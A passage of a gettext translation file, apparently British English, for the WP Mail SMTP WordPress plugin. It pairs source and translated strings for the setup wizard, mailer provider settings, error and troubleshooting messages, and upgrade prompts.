<b>%s</b> for a confirmation email." #: assets/languages/wp-mail-smtp-vue.php:828 msgid "Please enter a domain" msgstr "Please enter a domain" #: assets/languages/wp-mail-smtp-vue.php:831 msgid "Please enter a valid email address" msgstr "Please enter a valid email address" #: assets/languages/wp-mail-smtp-vue.php:623 msgid "Please select the Amazon SES API region which is the closest to where your website is hosted. This can help to decrease network latency between your site and Amazon SES, which will speed up email sending." msgstr "Please select the Amazon SES API region which is the closest to where your website is hosted. This can help to decrease network latency between your site and Amazon SES, which will speed up email sending." #: assets/languages/wp-mail-smtp-vue.php:371 msgid "Post SMTP Mailer" msgstr "Post SMTP Mailer" #: assets/languages/wp-mail-smtp-vue.php:159 msgid "Previous Step" msgstr "Previous Step" #: assets/languages/wp-mail-smtp-vue.php:626 msgid "Read how to set up Amazon SES" msgstr "Read how to set up Amazon SES" #: assets/languages/wp-mail-smtp-vue.php:269 msgid "Read how to set up Mailgun" msgstr "Read how to set up Mailgun" #: assets/languages/wp-mail-smtp-vue.php:490 msgid "Read how to set up SMTP.com" msgstr "Read how to set up SMTP.com" #: assets/languages/wp-mail-smtp-vue.php:299 msgid "Read how to set up Sendgrid" msgstr "Read how to set up Sendgrid" #: assets/languages/wp-mail-smtp-vue.php:566 msgid "Read how to set up Sendinblue" msgstr "Read how to set up Sendinblue" #: assets/languages/wp-mail-smtp-vue.php:463 msgid "Read how to set up Zoho Mail" msgstr "Read how to set up Zoho Mail" #: assets/languages/wp-mail-smtp-vue.php:741 msgid "Read how to set up the Gmail mailer" msgstr "Read how to set up the Gmail mailer" #: assets/languages/wp-mail-smtp-vue.php:654 msgid "Recommended Mailers" msgstr "Recommended Mailers" #: assets/languages/wp-mail-smtp-vue.php:457 msgid "Redirect URI" msgstr "Redirect URI" #: assets/languages/wp-mail-smtp-vue.php:856 msgid "Resend" msgstr "Resend" #: assets/languages/wp-mail-smtp-vue.php:23 msgid "Return to Mailer Settings" msgstr "Return to Mailer Settings" #: assets/languages/wp-mail-smtp-vue.php:620 msgid "SES Identities" msgstr "SES Identities" #: assets/languages/wp-mail-smtp-vue.php:374 msgid "SMTP Mailer" msgstr "SMTP Mailer" #: assets/languages/wp-mail-smtp-vue.php:155 msgid "Save and Continue" msgstr "Save and Continue" #: assets/languages/wp-mail-smtp-vue.php:617 msgid "Secret Access Key" msgstr "Secret Access Key" #: assets/languages/wp-mail-smtp-vue.php:738 msgid "Select which email address you would like to send your emails from." msgstr "Select which email address you would like to send your emails from." #: assets/languages/wp-mail-smtp-vue.php:347 msgid "Send us Feedback" msgstr "Send us Feedback" #: assets/languages/wp-mail-smtp-vue.php:17 msgid "Settings Updated" msgstr "Settings Updated" #: assets/languages/wp-mail-smtp-vue.php:362 msgid "Skip this Step" msgstr "Skip this Step" #: assets/languages/wp-mail-smtp-vue.php:344 msgid "Start Troubleshooting" msgstr "Start Troubleshooting" #. Translators: %1$s - the number of current step, %2$s - number of all steps. #: assets/languages/wp-mail-smtp-vue.php:306 msgid "Step %1$s of %2$s" msgstr "Step %1$s of %2$s" #: assets/languages/wp-mail-smtp-vue.php:326 msgid "The value entered does not match the required format" msgstr "The value entered does not match the required format" #: assets/languages/wp-mail-smtp-vue.php:777 msgid "There was an error while processing the authentication request. Please recheck your Client ID and Client Secret and try again." msgstr "There was an error while processing the authentication request. Please recheck your Client ID and Client Secret and try again." #. Translators: italic styling. #: assets/languages/wp-mail-smtp-vue.php:292 msgid "To send emails you will need only a %1$sMail Send%2$s access level for this API key." msgstr "To send emails you will need only a %1$sMail Send%2$s access level for this API key." #: assets/languages/wp-mail-smtp-vue.php:871 msgid "Value" msgstr "Value" #: assets/languages/wp-mail-smtp-vue.php:878 msgid "Verify Domain" msgstr "Verify Domain" #: assets/languages/wp-mail-smtp-vue.php:844 msgid "Verify Email" msgstr "Verify Email" #: assets/languages/wp-mail-smtp-vue.php:881 msgid "Verify Email Address" msgstr "Verify Email Address" #: assets/languages/wp-mail-smtp-vue.php:862 msgid "Verify SES Identity" msgstr "Verify SES Identity" #: assets/languages/wp-mail-smtp-vue.php:853 msgid "View DNS" msgstr "View DNS" #. Translators: Current WordPress version. #: assets/languages/wp-mail-smtp-vue.php:47 msgid "WP Mail SMTP has detected that your site is running an outdated version of WordPress (%s). WP Mail SMTP requires at least WordPress version 4.9." msgstr "WP Mail SMTP has detected that your site is running an outdated version of WordPress (%s). WP Mail SMTP requires at least WordPress version 4.9." #. Translators: Current PHP version and recommended PHP version. #: assets/languages/wp-mail-smtp-vue.php:40 msgid "WP Mail SMTP has detected that your site is running an outdated, insecure version of PHP (%1$s). Some mailers require at least PHP version 5.6. Updating to the recommended version (PHP %2$s) only takes a few minutes and will make your website significantly faster and more secure." msgstr "WP Mail SMTP has detected that your site is running an outdated, insecure version of PHP (%1$s). Some mailers require at least PHP version 5.6. Updating to the recommended version (PHP %2$s) only takes a few minutes and will make your website significantly faster and more secure." #: assets/languages/wp-mail-smtp-vue.php:377 msgid "WP SMTP" msgstr "WP SMTP" #: assets/languages/wp-mail-smtp-vue.php:356 msgid "We have detected other SMTP plugins installed on your website. Select which plugin's data you would like to import to WP Mail SMTP." msgstr "We have detected other SMTP plugins installed on your website. Select which plugin's data you would like to import to WP Mail SMTP." #: assets/languages/wp-mail-smtp-vue.php:341 msgid "We just tried to send a test email, but something prevented that from working. To see more details about the issue we detected, as well as our suggestions to fix it, please start troubleshooting." msgstr "We just tried to send a test email, but something prevented that from working. To see more details about the issue we detected, as well as our suggestions to fix it, please start troubleshooting." #: assets/languages/wp-mail-smtp-vue.php:137 msgid "Welcome to the WP Mail SMTP Setup Wizard!" msgstr "Welcome to the WP Mail SMTP Setup Wizard!" #: assets/languages/wp-mail-smtp-vue.php:140 msgid "We’ll guide you through each step needed to get WP Mail SMTP fully set up on your site." msgstr "We’ll guide you through each step needed to get WP Mail SMTP fully set up on your site." #: assets/languages/wp-mail-smtp-vue.php:338 msgid "Whoops, looks like things aren’t configured properly." msgstr "Whoops, looks like things aren’t configured properly." #: assets/languages/wp-mail-smtp-vue.php:26 msgid "Whoops, we found an issue!" msgstr "Whoops, we found an issue!" #: assets/languages/wp-mail-smtp-vue.php:43 msgid "Yikes! WordPress Update Required" msgstr "Yikes! WordPress Update Required" #: assets/languages/wp-mail-smtp-vue.php:86 msgid "You appear to be offline." msgstr "You appear to be offline." #: assets/languages/wp-mail-smtp-vue.php:134 msgid "You appear to be offline. Plugin information not retrieved." msgstr "You appear to be offline. Plugin information not retrieved." #: assets/languages/wp-mail-smtp-vue.php:125 msgid "You appear to be offline. Plugin not installed." msgstr "You appear to be offline. Plugin not installed." #: assets/languages/wp-mail-smtp-vue.php:850 msgid "You will not be able to send emails until you verify at least one domain or email address for the selected Amazon SES Region." msgstr "You will not be able to send emails until you verify at least one domain or email address for the selected Amazon SES Region." #: assets/languages/wp-mail-smtp-vue.php:660 msgid "is a PRO Feature" msgstr "is a PRO Feature" #: assets/languages/wp-mail-smtp-vue.php:834 msgid "Enter the domain name to verify it on Amazon SES and generate the required DNS CNAME records." msgstr "Enter the domain name to verify it on Amazon SES and generate the required DNS CNAME records." #. Translators: Link to Amazon SES documentation. #: assets/languages/wp-mail-smtp-vue.php:875 msgid "Please add these CNAME records to your domain's DNS settings. For information on how to add CNAME DNS records, please refer to the %1$sAmazon SES documentation%2$s." msgstr "Please add these CNAME records to your domain's DNS settings. For information on how to add CNAME DNS records, please refer to the %1$sAmazon SES documentation%2$s." #. Translators: Current PHP version and recommended PHP version. #: assets/languages/wp-mail-smtp-vue.php:33 msgid "WP Mail SMTP has detected that your site is running an outdated, insecure version of PHP (%1$s), which could be putting your site at risk for being hacked. WordPress stopped supporting your PHP version in April, 2019. Updating to the recommended version (PHP %2$s) only takes a few minutes and will make your website significantly faster and more secure." msgstr "WP Mail SMTP has detected that your site is running an outdated, insecure version of PHP (%1$s), which could be putting your site at risk for being hacked. WordPress stopped supporting your PHP version in April, 2019. Updating to the recommended version (PHP %2$s) only takes a few minutes and will make your website significantly faster and more secure." #: assets/languages/wp-mail-smtp-vue.php:36 msgid "Yikes! PHP Update Required" msgstr "Yikes! PHP Update Required" #: src/Admin/SetupWizard.php:1180 msgid "Please enter a valid license key!" msgstr "Please enter a valid licence key!" #: src/Admin/SetupWizard.php:1170 msgid "You are already using the WP Mail SMTP PRO version. Please refresh this page and verify your license key." msgstr "You are already using the WP Mail SMTP PRO version. Please refresh this page and verify your licence key." #: src/Admin/Pages/SettingsTab.php:185 msgid "Paste license key here" msgstr "Paste licence key here" #: src/Admin/Pages/SettingsTab.php:181 msgid "Already purchased? Simply enter your license key below to connect with WP Mail SMTP Pro!" msgstr "Already purchased? Simply enter your licence key below to connect with WP Mail SMTP Pro!" #. translators: %s - item state name. #: src/Admin/DomainChecker.php:190 msgid "%s icon" msgstr "%s icon" #. Translators: %s - discount value $50 #: src/Admin/SetupWizard.php:243 msgid "<strong>Bonus:</strong> WP Mail SMTP users get <span class=\"highlight\">%s off</span> regular price,<br>applied at checkout." msgstr "<strong>Bonus:</strong> WP Mail SMTP users get <span class=\"highlight\">$50 off</span> regular price,<br>applied at checkout." #: src/Admin/SetupWizard.php:1059 msgid "All in One SEO" msgstr "All in One SEO" #: src/Admin/SetupWizard.php:493 msgid "Confirm that your browser is updated to the latest version." msgstr "Confirm that your browser is updated to the latest version." #: assets/languages/wp-mail-smtp-vue.php:711 #: src/Admin/Pages/SettingsTab.php:187 msgid "Connect" msgstr "Connect" #: src/Admin/SetupWizard.php:505 msgid "Contact Us" msgstr "Contact Us" #: src/Admin/SetupWizard.php:502 msgid "Copy the error message above and paste it in a message to the WP Mail SMTP support team." msgstr "Copy the error message above and paste it in a message to the WP Mail SMTP support team." #: src/Admin/SetupWizard.php:888 src/Admin/SetupWizard.php:892 msgid "Could not install the plugin. Don't have file permission." msgstr "Could not install the plugin. Don't have file permission." #: src/Admin/SetupWizard.php:868 msgid "Could not install the plugin. Plugin slug is missing." msgstr "Could not install the plugin. Plugin slug is missing." #: src/Admin/SetupWizard.php:992 msgid "Could not install the plugin. WP Plugin installer could not retrieve plugin information." msgstr "Could not install the plugin. WP Plugin installer could not retrieve plugin information." #: src/Admin/SetupWizard.php:906 msgid "Could not install the plugin. WP Plugin installer initialization failed." msgstr "Could not install the plugin. WP Plugin installer initialization failed." #: src/Admin/SetupWizard.php:858 msgid "Could not install the plugin. You don't have permission to install plugins." msgstr "Could not install the plugin. You don't have permission to install plugins." #: src/Admin/DomainChecker.php:178 msgid "Domain Check Results" msgstr "Domain Check Results" #: src/Admin/SetupWizard.php:1077 msgid "Giveaways by RafflePress" msgstr "Giveaways by RafflePress" #: assets/languages/wp-mail-smtp-vue.php:146 src/Admin/SetupWizard.php:294 msgid "Go back to the Dashboard" msgstr "Go back to the Dashboard" #: src/Admin/SetupWizard.php:1065 msgid "Google Analytics by MonsterInsights" msgstr "Google Analytics by MonsterInsights" #: src/Admin/Pages/TestTab.php:775 msgid "If updating the API Key doesn't resolve this issue, please contact our support." msgstr "If updating the API Key doesn't resolve this issue, please contact our support." #: src/Admin/SetupWizard.php:491 msgid "If you are using an ad blocker, please disable it or whitelist the current page." msgstr "If you are using an ad blocker, please disable it or whitelist the current page." #: src/Admin/SetupWizard.php:492 msgid "If you aren't already using Chrome, Firefox, Safari, or Edge, then please try switching to one of these popular browsers." msgstr "If you aren't already using Chrome, Firefox, Safari, or Edge, then please try switching to one of these popular browsers." #: src/Admin/SetupWizard.php:496 msgid "If you've checked each of these details and are still running into issues, then please get in touch with our support team. We’d be happy to help!" msgstr "If you've checked each of these details and are still running into issues, then please get in touch with our support team. We’d be happy to help!" #: src/Admin/SetupWizard.php:488 msgid "In order to fix this issue, please check each of the items below:" msgstr "In order to fix this issue, please check each of the items below:" #: src/Admin/Pages/TestTab.php:767 msgid "Invalid SendGrid API key" msgstr "Invalid SendGrid API key" #: src/Admin/SetupWizard.php:486 msgid "It looks like something is preventing JavaScript from loading on your website. WP Mail SMTP requires JavaScript in order to give you the best possible experience." msgstr "It looks like something is preventing JavaScript from loading on your website. WP Mail SMTP requires JavaScript in order to give you the best possible experience." #: src/Admin/Pages/TestTab.php:769 msgid "It looks like your SendGrid API Key is invalid." msgstr "It looks like your SendGrid API Key is invalid." #: src/Admin/Pages/TestTab.php:773 msgid "Make sure your API Key in the SendGrid mailer settings is correct and valid." msgstr "Make sure your API Key in the SendGrid mailer settings is correct and valid." #: src/Admin/Pages/TestTab.php:774 msgid "Save the plugin settings." msgstr "Save the plugin settings." #: src/Admin/SetupWizard.php:1089 msgid "SeedProd Landing Page Builder" msgstr "SeedProd Landing Page Builder" #: src/Admin/Pages/SettingsTab.php:93 msgid "Setup Wizard" msgstr "Setup Wizard" #: src/Admin/SetupWizard.php:1083 msgid "Smash Balloon Social Photo Feed" msgstr "Smash Balloon Social Photo Feed" #: src/Admin/DomainChecker.php:70 msgid "Something went wrong. Please try again later." msgstr "Something went wrong. Please try again later." #: src/Admin/Pages/TestTab.php:1593 msgid "The test email might have sent, but its deliverability should be improved." msgstr "The test email might have sent, but its deliverability should be improved." #: src/Admin/SetupWizard.php:1190 msgid "Upgrade functionality not available!" msgstr "Upgrade functionality not available!" #: src/Admin/SetupWizard.php:1095 msgid "WP Call Button" msgstr "WP Call Button" #: src/Admin/SetupWizard.php:277 msgid "WP Mail SMTP › Setup Wizard" msgstr "WP Mail SMTP › Setup Wizard" #: assets/languages/wp-mail-smtp-vue.php:302 src/Admin/SetupWizard.php:477 msgid "WP Mail SMTP logo" msgstr "WP Mail SMTP logo" #: src/Admin/SetupWizard.php:238 msgid "We're sorry, the %mailer% mailer is not available on your plan. Please upgrade to the PRO plan to unlock all these awesome features." msgstr "We're sorry, the %mailer% mailer is not available on your plan. Please upgrade to the PRO plan to unlock all these awesome features." #: src/Admin/SetupWizard.php:485 msgid "Whoops, something's not working." msgstr "Whoops, something's not working." #: src/Admin/SetupWizard.php:552 src/Admin/SetupWizard.php:570 #: src/Admin/SetupWizard.php:634 msgid "You don't have permission to change options for this WP site!" msgstr "You don't have permission to change options for this WP site!" #: src/Admin/SetupWizard.php:1174 msgid "You don't have the permission to perform this action." msgstr "You don't have the permission to perform this action." #: src/Connect.php:129 msgid "Please enter your license key to connect." msgstr "Please enter your licence key to connect." #: src/Connect.php:56 msgid "Almost Done" msgstr "Almost Done" #: assets/languages/wp-mail-smtp-vue.php:8 #: src/Admin/Pages/DebugEventsTab.php:152 src/Connect.php:58 msgid "OK" msgstr "OK" #: src/Connect.php:137 msgid "Only the Lite version can be upgraded." msgstr "Only the Lite version can be upgraded." #: src/Connect.php:57 msgid "Oops!" msgstr "Oops!" #: src/Connect.php:301 msgid "Pro version installed but needs to be activated on the Plugins page." msgstr "Pro version installed but needs to be activated on the Plugins page." #: src/Connect.php:163 msgid "There was an error while generating an upgrade URL. Please try again." msgstr "There was an error while generating an upgrade URL. Please try again." #: src/Connect.php:231 msgid "There was an error while installing an upgrade. Please check file system permissions and try again. Also, you can download the plugin from wpmailsmtp.com and install it manually." msgstr "There was an error while installing an upgrade. Please check file system permissions and try again. Also, you can download the plugin from wpmailsmtp.com and install it manually." #: src/Connect.php:178 msgid "There was an error while installing an upgrade. Please download the plugin from wpmailsmtp.com and install it manually." msgstr "There was an error while installing an upgrade. Please download the plugin from wpmailsmtp.com and install it manually." #: src/Connect.php:263 msgid "There was an error while installing an upgrade. Please try again." msgstr "There was an error while installing an upgrade. Please try again." #: src/Connect.php:59 msgid "Unfortunately there was a server connection error." msgstr "Unfortunately there was a server connection error." #: src/Connect.php:152 msgid "WP Mail SMTP Pro was already installed, but was not active. We activated it for you." msgstr "WP Mail SMTP Pro was already installed, but was not active. We activated it for you." #: src/Connect.php:119 msgid "You are not allowed to install plugins." msgstr "You are not allowed to install plugins." #. translators: %s - URL to SendGrid documentation on wpmailsmtp.com #: src/Providers/Sendgrid/Options.php:120 msgid "Please input the sending domain/subdomain you configured in your SendGrid dashboard. More information can be found in our <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">SendGrid documentation</a>." msgstr "Please input the sending domain/subdomain you configured in your SendGrid dashboard. More information can be found in our <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">SendGrid documentation</a>." #: assets/languages/wp-mail-smtp-vue.php:284 #: src/Providers/Sendgrid/Options.php:107 #: src/Providers/Sendinblue/Options.php:143 msgid "Sending Domain" msgstr "Sending Domain" #: src/Admin/Area.php:428 msgid "If disabled, each subsite of this multisite will have its own WP Mail SMTP settings page that has to be configured separately." msgstr "If disabled, each subsite of this multisite will have its own WP Mail SMTP settings page that has to be configured separately." #: src/Admin/Area.php:430 msgid "If enabled, these global settings will manage email sending for all subsites of this multisite." msgstr "If enabled, these global settings will manage email sending for all subsites of this multisite." #: src/Admin/Area.php:424 msgid "Make the plugin settings global network-wide" msgstr "Make the plugin settings global network-wide" #: src/Admin/Area.php:407 msgid "Multisite" msgstr "Multisite" #: src/Providers/Gmail/Auth.php:144 msgid "Please make sure your Google Client ID and Secret in the plugin settings are valid. Save the settings and try the Authorization again." msgstr "Please make sure your Google Client ID and Secret in the plugin settings are valid. Save the settings and try the Authorization again." #: src/Admin/Area.php:408 msgid "Pro+ badge icon" msgstr "Pro+ badge icon" #: src/Admin/Area.php:418 msgid "Settings control" msgstr "Settings control" #: src/Admin/Area.php:411 msgid "Simply enable network-wide settings and every site on your network will inherit the same SMTP settings. Save time and only configure your SMTP provider once." msgstr "Simply enable network-wide settings and every site on your network will inherit the same SMTP settings. Save time and only configure your SMTP provider once." #: src/Providers/Gmail/Mailer.php:125 msgid "The email message ID is missing." msgstr "The email message ID is missing." #: src/Providers/OptionsAbstract.php:399 msgid "The password is encrypted in the database, but for improved security we recommend using your site's WordPress configuration file to set your password." msgstr "The password is encrypted in the database, but for improved security we recommend using your site's WordPress configuration file to set your password." #: src/Providers/Gmail/Mailer.php:120 msgid "The response object is invalid (missing getId method)." msgstr "The response object is invalid (missing getId method)." #: src/Admin/Pages/VersusTab.php:229 msgid "Access is limited to standard mailer options only" msgstr "Access is limited to standard mailer options only" #: src/Admin/Pages/VersusTab.php:207 msgid "Access to all Email Logging options right inside WordPress" msgstr "Access to all Email Logging options right inside WordPress" #: src/Admin/Pages/VersusTab.php:235 msgid "Additional Mailer Options" msgstr "Additional Mailer Options" #: src/Admin/Pages/VersusTab.php:249 msgid "All Global Network Settings" msgstr "All Global Network Settings" #: src/Admin/Pages/VersusTab.php:229 msgid "Limited Mailers" msgstr "Limited Mailers" #: assets/languages/wp-mail-smtp-vue.php:893 src/Core.php:1104 msgid "Loading" msgstr "Loading" #: src/Admin/Pages/VersusTab.php:178 msgid "Mailer Options" msgstr "Mailer Options" #: src/Admin/Pages/VersusTab.php:235 msgid "Microsoft Outlook (with Office365 support), Amazon SES and Zoho Mail" msgstr "Microsoft Outlook (with Office365 support), Amazon SES and Zoho Mail" #: src/Admin/Pages/VersusTab.php:243 msgid "No Global Network Settings" msgstr "No Global Network Settings" #: src/Admin/Pages/VersusTab.php:249 msgid "Optionally configure settings at the network level or manage separately for each subsite" msgstr "Optionally configure settings at the network level or manage separately for each subsite" #: src/Admin/Pages/VersusTab.php:179 msgid "WordPress Multisite" msgstr "WordPress Multisite" #: src/SiteHealth.php:159 msgid "Lite install date" msgstr "Lite install date" #: src/SiteHealth.php:160 msgid "M j, Y @ g:ia" msgstr "M j, Y @ g:ia" #: src/SiteHealth.php:176 msgid "None selected" msgstr "None selected" #: src/Providers/Zoho/Options.php:41 msgid "We're sorry, the Zoho Mail mailer is not available on your plan. Please upgrade to the PRO plan to unlock all these awesome features." msgstr "We're sorry, the Zoho Mail mailer is not available on your plan. Please upgrade to the PRO plan to unlock all these awesome features." #: src/Providers/Zoho/Options.php:25 msgid "Zoho Mail" msgstr "Zoho Mail" #: src/Admin/Pages/MiscTab.php:239 msgid "Allow Usage Tracking" msgstr "Allow Usage Tracking" #: assets/languages/wp-mail-smtp-vue.php:398 src/Admin/Pages/MiscTab.php:254 msgid "By allowing us to track usage data we can better help you because we know with which WordPress configurations, themes and plugins we should test." msgstr "By allowing us to track usage data we can better help you because we know with which WordPress configurations, themes and plugins we should test." #: src/Admin/Education.php:84 msgid "Dismiss this message." msgstr "Dismiss this message." #: src/Admin/Notifications.php:481 msgid "Dismiss this message" msgstr "Dismiss this message" #: src/Admin/Notifications.php:490 msgid "Next message" msgstr "Next message" #: src/Admin/Notifications.php:486 msgid "Previous message" msgstr "Previous message" #: src/Admin/Pages/AboutTab.php:161 msgid "Plugin icon" msgstr "Plugin icon" #: src/SiteHealth.php:145 msgid "DB tables" msgstr "DB tables" #: src/SiteHealth.php:102 msgid "Do WP Mail SMTP DB tables exist?" msgstr "Do WP Mail SMTP DB tables exist?" #: src/Admin/DebugEvents/Event.php:184 src/Providers/PepipostAPI/Mailer.php:342 msgid "Error" msgstr "Error" #: src/Providers/PepipostAPI/Mailer.php:341 msgid "General error" msgstr "General error" #. translators: %s - the list of missing tables separated by comma. #: src/SiteHealth.php:288 msgid "Missing table: %s" msgid_plural "Missing tables: %s" msgstr[0] "Missing table: %s" msgstr[1] "Missing tables: %s" #: src/SiteHealth.php:147 msgid "No DB tables found." msgstr "No DB tables found." #: src/SiteHealth.php:258 msgid "WP Mail SMTP DB tables are created" msgstr "WP Mail SMTP DB tables are created" #: src/SiteHealth.php:282 msgid "WP Mail SMTP DB tables check has failed" msgstr "WP Mail SMTP DB tables check has failed" #: src/SiteHealth.php:264 msgid "WP Mail SMTP is using custom database tables for some of its features. In order to work properly, the custom tables should be created, and it looks like they exist in your database." msgstr "WP Mail SMTP is using custom database tables for some of its features. In order to work properly, the custom tables should be created, and it looks like they exist in your database." #: src/Admin/Area.php:523 msgid "<p>The Default (PHP) mailer is currently selected, but is not recommended because in most cases it does not resolve email delivery issues.</p><p>Please consider selecting and configuring one of the other mailers.</p>" msgstr "<p>The Default (PHP) mailer is currently selected, but is not recommended because in most cases it does not resolve email delivery issues.</p><p>Please consider selecting and configuring one of the other mailers.</p>" #: src/Admin/Area.php:527 src/Admin/Pages/DebugEventsTab.php:149 msgid "Cancel" msgstr "Cancel" #: assets/languages/wp-mail-smtp-vue.php:11 src/Admin/Area.php:521 #: src/Admin/Pages/DebugEventsTab.php:153 msgid "Heads up!" msgstr "Heads up!" #: src/Admin/Review.php:167 msgid "I already did" msgstr "I already did" #. translators: %1$s - WP Mail SMTP, %2$s - error message. #: src/Migration.php:135 msgid "There was an error while upgrading the database. Please contact %1$s support with this information: %2$s." msgstr "There was an error while upgrading the database. Please contact %1$s support with this information: %2$s." #: src/Admin/Area.php:528 msgid "Warning icon" msgstr "Warning icon" #: src/Admin/Pages/TestTab.php:1261 msgid "(If cURL can't be enabled on your hosting server) Enable PHP setting: allow_url_fopen, by adding \"allow_url_fopen = On\" to the php.ini file (without the quotation marks)" msgstr "(If cURL can't be enabled on your hosting server) Enable PHP setting: allow_url_fopen, by adding \"allow_url_fopen = On\" to the php.ini file (without the quotation marks)" #: src/Admin/Pages/TestTab.php:1260 msgid "(Recommended) Enable PHP extension: cURL, by adding \"extension=curl\" to the php.ini file (without the quotation marks) OR" msgstr "(Recommended) Enable PHP extension: cURL, by adding \"extension=curl\" to the php.ini file (without the quotation marks) OR" #: src/Admin/Review.php:137 msgid "Are you enjoying WP Mail SMTP?" msgstr "Are you enjoying WP Mail SMTP?" #. translators: %s - URL to the PHP openssl manual #: src/Admin/Pages/TestTab.php:881 msgid "Contact your hosting support, show them the \"full Error Log for debugging\" below and share this <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">link</a> with them." msgstr "Contact your hosting support, show them the \"full Error Log for debugging\" below and share this <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">link</a> with them." #: src/Admin/Pages/TestTab.php:1332 msgid "Contact your web hosting provider and inform them you are having issues with libpcre2 library on PHP 7.4." msgstr "Contact your web hosting provider and inform them you are having issues with libpcre2 library on PHP 7.4." #: src/Admin/Pages/TestTab.php:1259 msgid "Edit your php.ini file on your hosting server." msgstr "Edit your php.ini file on your hosting server." #: src/Admin/Pages/TestTab.php:1334 msgid "For a quick fix, until your web hosting resolves this, you can downgrade to PHP version 7.3 on your server." msgstr "For a quick fix, until your web hosting resolves this, you can downgrade to PHP version 7.3 on your server." #: src/Admin/Pages/TestTab.php:1254 msgid "GuzzleHttp requirements." msgstr "GuzzleHttp requirements." #: src/Admin/Pages/TestTab.php:1256 msgid "GuzzleHttp requires cURL, the allow_url_fopen ini setting, or a custom HTTP handler." msgstr "GuzzleHttp requires cURL, the allow_url_fopen ini setting, or a custom HTTP handler." #: src/Admin/Pages/TestTab.php:1262 msgid "If you don't know how to do the above we strongly suggest contacting your hosting support and provide them the \"full Error Log for debugging\" below and these steps. They should be able to fix this issue for you." msgstr "If you don't know how to do the above we strongly suggest contacting your hosting support and provide them the \"full Error Log for debugging\" below and these steps. They should be able to fix this issue for you." #: src/Admin/Pages/TestTab.php:1328 msgid "It looks like your server is running PHP version 7.4.x with an outdated PCRE library (libpcre2) that has a known issue with email address validation." msgstr "It looks like your server is running PHP version 7.4.x with an outdated PCRE library (libpcre2) that has a known issue with email address validation." #: src/Admin/Pages/TestTab.php:872 msgid "Misconfigured server certificate." msgstr "Misconfigured server certificate." #: src/Admin/Review.php:156 msgid "No thanks" msgstr "No thanks" #: src/Admin/Pages/TestTab.php:1326 msgid "PCRE library issue" msgstr "PCRE library issue" #: src/Admin/Pages/TestTab.php:1245 msgid "Please make sure you entered an accurate Sender Name in WP Mail SMTP plugin settings." msgstr "Please make sure you entered an accurate Sender Name in WP Mail SMTP plugin settings." #: src/Providers/Gmail/Mailer.php:248 msgid "Please re-grant Google app permissions!" msgstr "Please re-grant Google app permissions!" #. translators: %s - The URL to the constants support article. #: src/Admin/Pages/MiscTab.php:118 msgid "Please read this <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">support article</a> if you want to enable this option using constants." msgstr "Please read this <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">support article</a> if you want to enable this option using constants." #: src/Admin/Pages/TestTab.php:1240 msgid "SMTP.com API Error." msgstr "SMTP.com API Error." #: src/Admin/Pages/TestTab.php:1122 src/Providers/Gmail/Mailer.php:250 msgid "Then click the “Allow plugin to send emails using your Google account” button and re-enable access." msgstr "Then click the “Allow plugin to send emails using your Google account” button and re-enable access." #: src/Admin/Pages/TestTab.php:875 msgid "There are a few reasons why this is happening. It could be that the host certificate is misconfigured, or this server's OpenSSL is using an outdated CA bundle." msgstr "There are a few reasons why this is happening. It could be that the host certificate is misconfigured, or this server's OpenSSL is using an outdated CA bundle." #: src/Admin/Pages/TestTab.php:1329 msgid "There is a known issue with PHP version 7.4.x, when using libpcre2 library version lower than 10.33." msgstr "There is a known issue with PHP version 7.4.x, when using libpcre2 library version lower than 10.33." #: src/Admin/Pages/TestTab.php:1333 msgid "They should be able to resolve this issue for you." msgstr "They should be able to resolve this issue for you." #: src/Admin/Pages/TestTab.php:874 msgid "This means OpenSSL on your server isn't able to verify the host certificate." msgstr "This means OpenSSL on your server isn't able to verify the host certificate." #: src/Admin/Pages/TestTab.php:878 msgid "Verify that the host's SSL certificate is valid." msgstr "Verify that the host's SSL certificate is valid." #: src/Admin/Review.php:144 msgid "We're sorry to hear you aren't enjoying WP Mail SMTP. We would love a chance to improve. Could you take a minute and let us know what we can do better?" msgstr "We're sorry to hear you aren't enjoying WP Mail SMTP. We would love a chance to improve. Could you take a minute and let us know what we can do better?" #: src/Admin/Pages/DebugEventsTab.php:151 src/Admin/Review.php:139 msgid "Yes" msgstr "Yes" #: src/Admin/Pages/TestTab.php:1242 msgid "Your Sender Name option is incorrect." msgstr "Your Sender Name option is incorrect." #. translators: %s - Provider name #: src/Providers/OptionsAbstract.php:492 msgid "%s requires an SSL certificate, and so is not currently compatible with your site. Please contact your host to request a SSL certificate, or check out <a href=\"https://www.wpbeginner.com/wp-tutorials/how-to-add-ssl-and-https-in-wordpress/\" target=\"_blank\">WPBeginner's tutorial on how to set up SSL</a>." msgstr "%s requires an SSL certificate, and so is not currently compatible with your site. Please contact your host to request a SSL certificate, or check out <a href=\"https://www.wpbeginner.com/wp-tutorials/how-to-add-ssl-and-https-in-wordpress/\" target=\"_blank\">WPBeginner's tutorial on how to set up SSL</a>." #: src/Providers/OptionsAbstract.php:505 msgid "If you'd prefer not to set up SSL, or need an SMTP solution in the meantime, please select a different mailer option." msgstr "If you'd prefer not to set up SSL, or need an SMTP solution in the meantime, please select a different mailer option." #: src/Providers/OptionsAbstract.php:405 msgid "Learn More" msgstr "Learn More" #: src/Providers/PepipostAPI/Options.php:55 msgid "Get Started with Pepipost" msgstr "Get Started with Pepipost" #. translators: %s - Channel/Sender Name link for smtp.com documentation. #: src/Providers/SMTPcom/Options.php:153 msgid "Follow this link to get a Sender Name from SMTP.com: %s." msgstr "Follow this link to get a Sender Name from SMTP.com: %s." #. translators: %s - API key link. #: src/Providers/SMTPcom/Options.php:124 msgid "Follow this link to get an API Key from SMTP.com: %s." msgstr "Follow this link to get an API Key from SMTP.com: %s." #: src/Providers/Sendlayer/Options.php:122 #: src/Providers/SMTPcom/Options.php:126 #: src/Providers/SparkPost/Options.php:111 msgid "Get API Key" msgstr "Get API Key" #: src/Providers/SMTPcom/Options.php:155 msgid "Get Sender Name" msgstr "Get Sender Name" #: assets/languages/wp-mail-smtp-vue.php:487 #: src/Providers/SMTPcom/Options.php:68 msgid "Get Started with SMTP.com" msgstr "Get Started with SMTP.com" #: src/Providers/SMTPcom/Options.php:82 msgid "SMTP.com" msgstr "SMTP.com" #: assets/languages/wp-mail-smtp-vue.php:476 #: src/Providers/SMTPcom/Options.php:137 msgid "Sender Name" msgstr "Sender Name" #: 